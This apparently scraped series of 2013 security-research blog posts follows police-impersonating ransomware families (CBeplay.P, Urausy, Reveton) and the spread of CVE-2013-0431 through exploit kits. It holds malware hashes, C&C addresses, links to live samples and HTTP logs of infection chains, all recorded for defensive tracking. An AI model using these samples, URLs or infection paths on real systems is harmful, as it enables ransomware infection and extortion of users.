≪ Previous: Inside Multi-Botnet ver.4 c&c Panel

$

0

0

The second group (after Reveton distributors) to have subscribe for Cool EK is pushing a ransomware that i refer to (using name attached to it by Microsoft) CBeplay.P
There are some move lately but I can't tell how fresh is this as they are not that easy to monitor.

They are now targeting US :

CBeplay.P US (2013-02)

AT :

CBeplay.P AT (2013-02)

And they are now talking to UK citizens repeating every 35 seconds : "Attention illegal Activity has been detected on your computer"

Appeared in middle of August 2012, the binary is localized. The user interface is embedded in the binary.
One sample for one country.

How do they target ? this is done by TDS(want to know more about TDS look here)in front of the Exploit Kit that will redirect you to the appropriate landings depending on where you are coming from.
(I wonder how they manage distribution of the correct payload for CVE-2011-0432 and CVE-2012-1889  on Cool EK...I feel like it's kind of random )

Readings :
Joe Sandbox analysis of ES payload from 2013-01-10
Botnets.fr CBeplay.P page (with all known landings)
Reveton can speak now ! 2012-11-23

Files :
The video :
http://goo.gl/AjpSL (Mega) (you can use it, just mention where it come from)
mirror:
http://goo.gl/52Zdu (Owncloud)

Samples & Fiddler (Cbeplay.P Cool EK and the new xored payload) :
http://goo.gl/cbqtN (Owncloud)


I do not know if there are User interface for all countries.

ES : 5e92fc879142ca7ebdada8ad9bc8c6e5 - 5b0ae7b69cbdc392edddd15fdc9d8ee8
NL : 30fd781b2a9b87410917785f1915b030 - 4e2bb5943c28604180a089e54b5e7d03
UK : 038bd0b7553184b10cb9a603effe7cde
AT : 5ff2887727b00584cdab99fafb4dc969
US : a22542163ef2f88bc11c483009d592da

No User interface or just me not able to get it :
b9c2e66a5dfd1e9eff2e34dbc113de1c
d8d73de0806a8e74b3c8eba5394367f0
737fe54c4c6e5419323984abe59ffbe3
19e095105de2f584ae8310c0d0a0a6d2
7e42793d4e9ac0c9a2378d94249322f3
1dbd8612b6042c468336eefaed9c21fc (FR)

Urausy: Colorfull design refresh (+HR) & EC3 Logo

February 8, 2013, 8:13 pm

≫ Next: Reveton: Winter Collection II - Design refresh, ICE and EC3 logo

≪ Previous: Cbeplay.P targets US and AT, now talks to UK Citizens

$

0

0

One of the images in Urausy Design

First spotted by Tachion  (VT Profile) from Safegroup.pl  and soon after seen by Malekal (VT Profile), Urausy is now showing its new clothes. New (to me) targeted country : Croatia (HR)

Urausy colorfull refresh in one image

The lock screen will appear more than 5 minutes after infection.
We can notice the logo of the newly created EC3 (European Cybercrime Center)
There is no default country anymore. If your country is not targeted your computer won't be locked.
(more if it's locked, it will be unlock if computer is started with internet in a country not targeted)

They are still using targeted Antivirus logos.
You'll have Windows Logo if you have no antivirus otherwise you'll get the logo of your antivirus.

Antivirus or Windows logo placeholder

The list is somewhat exhaustive :

List of logos Urausy can use depending on products installed on your computer (stored in %temp% of infected computer)

Here are most of the targeted design.

Australia :

Urausy AU 2013-02

Austria :

Urausy AT 2013-02

Belgium :
No design ? or me not able to get it.

Canada :

Urausy CA 2013-02

Croatia :

Urausy HR 2013-02

Cyprus :

Urausy CY 2013-02

Czech Republic :

Urausy CZ 2013-02

Denmark :

Urausy DK 2013-02

Finland :

Urausy FI 2013-02

France :

Urausy FR 2013-02

Germany :

Urausy DE 2013-02

Greece :

Urausy GR 2013-02

Hungary :

Urausy HU 2013-02

Italy :

Urausy IT 2013-02

Ireland :

Urausy IE 2013-02

Latvia :

Urausy LV 2013-02

Luxembourg :

Urausy LU 2013-02

Netherlands:

Urausy NL 2013-02

Norway :

Urausy NO 2013-02

Poland :

Urausy PL 2013-02

Portugal :

Urausy PT 2013-02

Romania :

Urausy RO 2013-02

Slovakia :
There should be a design that I was not able to gather.

Slovenia :

Urausy SI 2013-02

Spain :

Urausy ES 2013-02

Sweden :

Urausy SE 2013-02

Switzerland :

Urausy CH 2013-02

Turkey :

Urausy TR 2013-02

United Kingdom :

Urausy UK 2013-02

United States :

Urausy US 2013-02

I have the feeling that the team behind Urausy is also behind the Exploit Kit that Emerging Threats name Sibhost (or if there are two teams they are really tied).

Sibhost login Screen

One Sibhost pushing Urausy 2013-01-27

Sibhost pushing Urausy 2013-02-09

Sibhost was pushing Reveton only. When Urausy emerges it was on Sibhost only, showing bought/stolen design of Reveton. Only Urausy on Sibhost since then (but Urausy is now also pushed on many other exploit kits and in some botnets).
This feeling has been reenforced few days ago when i discovered that Urausy C&C redirectors were also Sibhost redirectors.


Read more :
Urausy page on botnets.fr (you'll find all known design there)
Urausy has big plan for Europe - Targeting 3 new countries among which Norway ! 2012-09-22
Urausy improving its localization - A (the?) Gaelic Ransomware with Interpol impersonation as default landing 2012-09-15

Files : (samples + 4 fiddlers of Urausy Drop (2x Sibhost, 1NP, 1WH) )
http://goo.gl/cnByK (Owncloud)

Reveton: Winter Collection II - Design refresh, ICE and EC3 logo

February 17, 2013, 6:59 pm

≫ Next: CVE-2013-0431 (java 1.7 update 11) ermerging in Exploit Kits

≪ Previous: Urausy: Colorfull design refresh (+HR) & EC3 Logo

$

0

0

One week ago Urausy refreshed their design. So is doing Reveton team with lighter ones.  (I will refer to these design as Winter Collection II )

Reveton Winter Collection II in one Image (too small ? - http://goo.gl/kOLtV - 9mb )

(By the way : No ! Reveton team has not been arrested...the key guy arrested past week by Spanish Police is the guy that was behind Ransom.EY (named Ransomgerpo by Symantec) and I was surprised with what i read here and there...in my opinion this is very far from being the most sophisticated Ransomware group... 3-4 ips for the C&C in months. The architecture is not as evolved as the one from Urausy or Reveton team. Anyway props to Spanish Police and Europol !)

What's new ?
As Urausy introduced it,  EC3 logo, Hadopi, ICSPA :

EC3 logo in some European design of Reveton Ransomware (CH,CY, CZ, DE, ES, FI, FR, GR, HU, IE, IT, LU, LV, NL, NO, PL, PT, RO, SE, SI,TR, UK)

Hadopi Logo for French citizen

ICSPA in AU,UK design

400$ (!?!) in United States and ICE impersonation :

ICE logo in US (and interpol too)

400$ for US citizen.... o_0

Australia :

Reveton AU 2013-02

Austria :

Reveton AT 2013-02

Canada :

Reveton CA 2013-02

Cyprus :

Reveton CY 2013-02

Czech Republic :

Reveton CZ 2013-02

Denmark :
18/02/13 - Design not updated. Still in Winter Collection I

Finland :

Reveton FI 2013-02

France :

Reveton FR 2013-02 See new Hadopi logo as in Urausy Design

Germany :

Reveton DE 2013-02

Greece :

Reveton GR 2013-02

Hungary :

Reveton HU 2013-02

Ireland :

Reveton IE 2013-02

Italy :

Reveton IT 2013-02

Latvia :

Reveton LV 2013-02

Luxembourg :

Reveton LU 2013-02

Netherlands :

Reveton NL 2013-02

Norway :

Reveton NO 2013-02

Poland :

Reveton PL 2013-02

Portugal :

Reveton PT 2013-02

Romania :

Reveton RO 2013-02

Slovakia :

Reveton SK 2013-02

Slovenia :

Reveton SI 2013-02

Spain :

Reveton ES 2013-02

Sweden :

Reveton SE 2013-02

Switzerland :

Reveton CH 2013-02

Turkey:

Reveton TR 2013-02

United Kingdom :

Reveton UK 2013-02

United States :

Reveton US 2013-02

The ICE was really fast to react with a Scam Alert
http://www.ice.gov/news/releases/1302/130215washingtondc2.htm

C&C now ?

Reveton Calling Home 18/02/2013

Samples: 37b5bf76d6128743cca6accdc762e941 for instance
http://goo.gl/edIZO (OwnCloud)


More about Reveton ?
See Reveton page on https://www.botnets.fr/index.php/Reveton
Kernel Mode Thread
Reveton - Winter Collection - 2012-12-21
Reveton can speak now ! - 2012-11-23
Reveton += HU, LV, SK, SI, TR (!), RO - So spreading accross Europe with 6 new Design 2012-10-29
Reveton Autumn Collection += AU,CZ, IE, NO & 17 new design - 2012-10-12
Inside a ‘Reveton’ Ransomware Operation 2012-08-13 - Brian Krebs - Krebs on Security

CVE-2013-0431 (java 1.7 update 11) ermerging in Exploit Kits

February 20, 2013, 8:28 am

≫ Next: CBeplay.P : Now target Australia and moved to server side localization

≪ Previous: Reveton: Winter Collection II - Design refresh, ICE and EC3 logo

$

0

0

Soon after Oracle released Java 7 Update 11,  fixing exploit widely used (CVE-2013-0422), Adam Gowdiak warned on Full Disclosure about successful security sandbox bypass via a bug in MBeanInstantiator.

This vulnerability was fixed with Java 7 update 13 on February 1st.

On February 18th Chris Wakelinspotted in one Jar file of Cool EK code that match issue 52 explained by Adam Gowdiak in Full Disclosure

A fast check with Jre 1.7u11 on Cool EK

CVE-2013-0431 successfull path in Cool EK 2013/02/18

Note : Eric Romang made some search and figured out that it was in  Cool EK since at least 2013-02-15

CVE-2013-0431 related code in Jar file of Cool EK

Note : user interaction is needed prior to infection.

IE9 on Win7 - jre17u11 - Java Warning You won't be infected as long as you do not click on Run

I checked most of widely used exploit kits (Sibhost, SofosFO, Sakura, Sweet Orange, Nuclear Pack, WhiteHole, Blackhole (3 instances), Redkit , Popads, CritXPack) and it appears that Popads has also already integrated this CVE

CVE-2013-0431 Positive path in Popads EK

(for those who would like to attach URL pattern to what Emerging Threats name Popads :
(As usual, if you name this another way, or know real name, would love to hear about it.
kafeine at dontneedcoffee dot com)

GET http://kj.10yatenson .info/?ad80b4a17c0cd8ca7797311791719670=15&a637feb11696dbd4d12db0e9accbce80=[[here_referer_was_often_popads_in_the_past]]
200 OK (text/html)

GET http://kj.10yatenson.info /02f8b27aaf288fd4f3d7816800429b15/da5fdd5ad0b1305ecca9630e1b7aaf74.jar
200 OK (application/x-java-archive)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/da5fdd5ad0b1305ecca9630e1b7aaf74.jar
200 OK (application/x-java-archive)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/java/lang/ClassBeanInfo.class
404 Not Found (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/java/lang/ObjectBeanInfo.class
404 Not Found (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/java/lang/ObjectCustomizer.class
404 Not Found (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/java/lang/ClassCustomizer.class
404 Not Found (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/0
200 OK (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/1
200 OK (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/2
200 OK (text/html)

GET http://kj.10yatenson .info/02f8b27aaf288fd4f3d7816800429b15/4
200 OK (text/html)

POST http://ylxisjzochloq .net/ylxis.php
200 OK (text/html)  (Payload call)

)

The day after this exploit was spotted in some Blackholes. Now that the source is public we can expect a fast global adoption (will publish fiddler and URL paths as i found it appearing in exploit kits here).


By the way, want to say well done to GoDaddy security team :

2 pass...and happy to say GoDaddy 1 - Reveton Team 0 for at least the 14 minutes that domain was in the rotation Around 300 infections avoided (or  should I say delayed ;)  )

<edit1 22/02/13>
Custom BH EK :

Custom BH EK CVE-2013-0431 positive path 2013-02-22

GET http://149.47.209 .177/b7f94a1f95bcedec75c333c2d09d7b40/q.php
200 OK (text/html)

GET http://149.47.209 .177/b7f94a1f95bcedec75c333c2d09d7b40/q.php?ognfbrop=xqvw&qssx=lcqm
200 OK (application/java-archive) 3e857fd86fba2aaf7dbd316bb39332c3

GET http://149.47.209 .177/b7f94a1f95bcedec75c333c2d09d7b40/b7f94a1f95bcedec75c333c2d09d7b40/q.php?qf=1n:31:1i:32:31&de=1g:1n:32:33:1n:1n:1n:2v:31:1o&g=1f&hv=k&qh=l&jopa=7741134
200 OK (application/x-msdownload)

(File will be provided in Set2 soon)

</edit1>


Some Md5:
Cool EK :
0f42303fb6830d141493b2b64102d1e5 - 170c03967a2878b62ae8bc2b2e2590a6 - 97ad65a3458e4d8551e4bc0ff4a8f97c
Popads :
35c129b2167cbc07c214b289fea0b41c

Files :
CVE-2013-0431_Set1 (Mega via Google Url Shortener)
CVE-2013-0431_Set1 Mirror (OwnCloud via Google Url Shortener)

Reading :
CVE-2013-0431 Mittre
More soon.

CBeplay.P : Now target Australia and moved to server side localization

February 21, 2013, 9:56 am

≫ Next: Popads add Social Engineering : Self-Generated fake cert on jar applet

≪ Previous: CVE-2013-0431 (java 1.7 update 11) ermerging in Exploit Kits

$

0

0

The VMaware CBeplay.P is moving (to learn about the past look here ).

 CBeplay is stealing/borrowing design from Urausy (AU - ES - NL)
- It's not talking anymore to UK Citizen
- The design is not embedded anymore in the binary but downloaded from the C&C.
(to be honest I was expecting that move to occur earlier, this choice was complicating their life for sure. This required one exploit kit landing by binary (on Cool EK) and traff work in front of the exploit kit + more compilation/crypting)

This move allow the team to enjoy font drop with one fixed payload  and to easily target more countries.
Expect far more to come.....

All Design :
 (a small  watermark has been included, up left, on some -  sorry about that, too lazy to remake affected screenshots)

Australia (newly targeted by this threat - it's also the Default design) :

CBeplay.P AU in it's Windows Form - 2013-02

CBeplay.P AU (scroll inside the form) 2013-02

Austria (updated design):

CBeplay.P AT 2013-02 in its Windows form

CBeplay AT 2013-02 Scrolled

Belgium (no change) :

CBeplay.P BE 2013-02

France (no change but new capture for me) :

CBeplay.P FR

Germany (no change):

CBeplay.P DE 2013-02

Italy (no change):

CBeplay.P IT 2013-02

Luxembourg (no change):

CBeplay.P LU (2013-02)

Netherlands (no change):

CBeplay NL 2013-02

Spain (updated design) :

CBeplay.P ES in its windows Form (2013-02)

CBeplay.P ES Scrolled 2013-02

Sweden (no change) :

CBeplay.P SE 2013-02

United Kingdom (no more voice):

CBeplay.P UK 2013-02

United States (recent but not change) :

CBeplay.P US 2013-02

C&C :

Design : 87.117.253.11

French Design download by CBeplay.P

Payment/Check : 93.115.240.226

"Mama's gonna make all your nightmares come true."

Infection:
 (Got some help on that one. Waiting approval for proper credits) 

Cool EK  CVE-2013-0431 successfull path leading to infection by CBeplay.P

Files :  883cfd95ccc89de70c20015e8479e936 (vt link)

883cfd95ccc89de70c20015e8479e936_CBeplay.P_210213.zip (Mega via Goo.g shortener)

883cfd95ccc89de70c20015e8479e936_CBeplay.P_210213.zip (OwnCloud via Goo.gl shortener)

Read:

Botnets.fr CBeplay.P page (i will update soon...)